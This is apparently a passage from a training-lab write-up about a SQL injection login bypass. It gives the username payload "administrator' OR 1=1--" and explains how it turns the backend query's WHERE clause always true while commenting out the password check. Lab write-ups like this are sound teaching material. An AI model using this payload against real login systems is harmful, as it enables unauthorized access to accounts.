We used the following payload in the Username tab :
administrator' OR 1=1--
And was able to solve the lab :
This is how MySQL query might look like on the backend after injecting the payload:
SELECT * FROM users WHERE username = 'administrator' OR 1=1--' AND password = 'somepassword'- The injected username parameter is
'administrator' OR 1=1--', which makes the WHERE clause always evaluate to true due to the condition1=1. - The rest of the query after the double hyphens
--is commented out, preventing any syntax errors caused by the injected payload.